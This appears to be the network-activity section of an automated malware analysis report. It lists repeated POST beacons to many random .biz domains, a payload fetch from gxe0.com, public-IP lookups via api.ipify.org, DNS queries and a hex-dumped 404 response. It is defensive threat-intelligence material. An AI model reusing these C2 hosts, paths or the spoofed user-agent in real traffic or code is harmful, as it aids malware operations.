                    Source: global trafficHTTP traffic detected: POST /sfduvqthq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oitokksbsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rmu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ajqmmfcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /txgdoagkkmvqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /wmyvrothcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dqpygue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ubrpiugbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qjkfpfdycqfln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /vauoordpmpgaykv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jsmhknoucgib HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /udyyttdfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rvwkmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /yfqsba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /emfmvfownawowh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dgxlfefuhlec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /txfroxnfrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ptd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /wm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fuqbdfcow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /binfxyplqyoumy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tkvhoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /dafungtde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tgphsmbcvwmuwmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /nnsajrfcymu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dqxhnesyyna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ghhknbcvfb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /met HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qtbrykoecwonf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /apsbtqhunyqqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /pgnqnbmeojw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /onutm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sjpfgfxfdnggnnio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rntyad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /vbngsfyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /isfkmckm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /xc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fwkhevjnywgrfjvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qqnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: gxe0.com
                    Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                    Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                    Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                    Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                    Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                    Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                    Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                    Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                    Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                    Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                    Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                    Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                    Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                    Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                    Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                    Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                    Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                    Source: global trafficDNS traffic detected: DNS query: deoci.biz
                    Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                    Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                    Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                    Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                    Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                    Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                    Source: global trafficDNS traffic detected: DNS query: myups.biz
                    Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                    Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                    Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                    Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                    Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                    Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                    Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                    Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                    Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                    Source: global trafficDNS traffic detected: DNS query: vyome.biz
                    Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                    Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                    Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                    Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                    Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                    Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                    Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                    Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                    Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                    Source: global trafficDNS traffic detected: DNS query: brsua.biz
                    Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                    Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                    Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                    Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                    Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                    Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                    Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                    Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                    Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                    Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                    Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                    Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                    Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                    Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                    Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                    Source: unknownHTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:43 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 